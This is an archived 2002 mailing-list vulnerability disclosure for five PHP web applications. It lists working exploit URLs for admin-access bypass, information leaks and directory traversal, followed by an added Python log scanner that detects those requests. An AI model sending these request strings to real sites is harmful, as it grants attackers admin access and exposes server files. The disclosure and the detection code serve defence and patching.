Hello people :)

Product 1 :
***********
Rose
http://www.jinxm.co.uk

Version :
4.52

Problem :
- Admin access

Exploit :
- newsadmin/upload.php?userinfo[username]=hop&userinfo[userlevel]=100


Product 2 :
***********
EasyNews
http://www.webrc.ca

Version :
4.3

Problem :
- Admin access

Exploits :
- admin.php?en_log_id=0&action=users
- admin.php?en_log_id=0&action=config


Product 3 :
***********
User Online
http://www.elpar.net

Version :
2.0

Problem :
- Information recovery

Exploit :
- /ip.txt


Product 4 :
***********
Mon Album
http://www.3dsrc.com

Version :
0.6.2d

Problems :
- Information recovery
- Admin access

Exploits :
- admin/admin_phpinfo.php4
- admin.php4?reg_login=1


Product 5 :
***********
KorWebLog
http://weblog.kldp.org/
http://eunjea.sourceforge.net/

Version :
1.5.8

Problems :
- Path disclosure
- Hard disk file listing

Exploits :
- viewimg.php?path=viewimg.php&form=1&var=1
- viewimg.php?path=../../../path/to/list&form=1&var=1


More details in French :
http://www.ifrance.com/kitetoua/tuto/5holes7.txt

Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2F5holes7.txt&langpair=fr%7Cen&hl=fr&prev=%2Flanguage_tools

frog-m@n
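For administrators running any of these five products, the following added example (not part of the original post) checks web server access logs for the request patterns listed above. It assumes NCSA/Apache-style log lines; the function names, label strings and sample log entries are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Request line inside an NCSA/Apache access-log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(target):
    """Return which advisory item a request target matches, or None."""
    path, _, query = target.partition("?")
    name = unquote(path).rsplit("/", 1)[-1].lower()
    # parse_qsl percent-decodes, so userinfo%5Buserlevel%5D is caught as well
    params = dict(parse_qsl(query, keep_blank_values=True))
    if name == "upload.php" and any(k.startswith("userinfo[") for k in params):
        return "Rose: userinfo[] supplied by client"
    if name == "admin.php" and params.get("en_log_id") == "0":
        return "EasyNews: en_log_id=0"
    if name == "ip.txt":
        return "User Online: ip.txt fetched"
    if name == "admin_phpinfo.php4":
        return "Mon Album: admin_phpinfo.php4 fetched"
    if name == "admin.php4" and "reg_login" in params:
        return "Mon Album: reg_login supplied by client"
    if name == "viewimg.php" and "path" in params:
        p = params["path"]
        if ".." in p or p.startswith("/") or p.lower().endswith(".php"):
            return "KorWebLog: suspicious path parameter"
    return None

def scan(lines):
    """Return (line_number, label) for every log line that matches."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        label = classify(m.group(1)) if m else None
        if label:
            hits.append((n, label))
    return hits

# Constructed sample log lines (documentation-range addresses, made-up paths).
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Jun/2002:09:00:01 -0700] "GET /newsadmin/upload.php?userinfo%5Busername%5D=x&userinfo%5Buserlevel%5D=100 HTTP/1.0" 200 512',
    '192.0.2.10 - - [06/Jun/2002:09:00:02 -0700] "GET /index.php HTTP/1.0" 200 2048',
    '192.0.2.11 - - [06/Jun/2002:09:00:03 -0700] "GET /album/admin.php4?reg_login=1 HTTP/1.0" 200 900',
    '192.0.2.12 - - [06/Jun/2002:09:00:04 -0700] "GET /weblog/viewimg.php?path=..%2F..%2Fetc&form=1&var=1 HTTP/1.0" 200 300',
    '192.0.2.13 - - [06/Jun/2002:09:00:05 -0700] "GET /weblog/viewimg.php?path=img/cat.jpg&form=1&var=1 HTTP/1.0" 200 300',
]

if __name__ == "__main__":
    for n, label in scan(SAMPLE_LOG):
        print(n, label)
```

Access logs record only the request line, so the same parameters sent in a POST body or a cookie will not appear here and need application-level logging to be seen.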
This archive was generated by hypermail 2b30 : Thu Jun 06 2002 - 09:32:26 PDT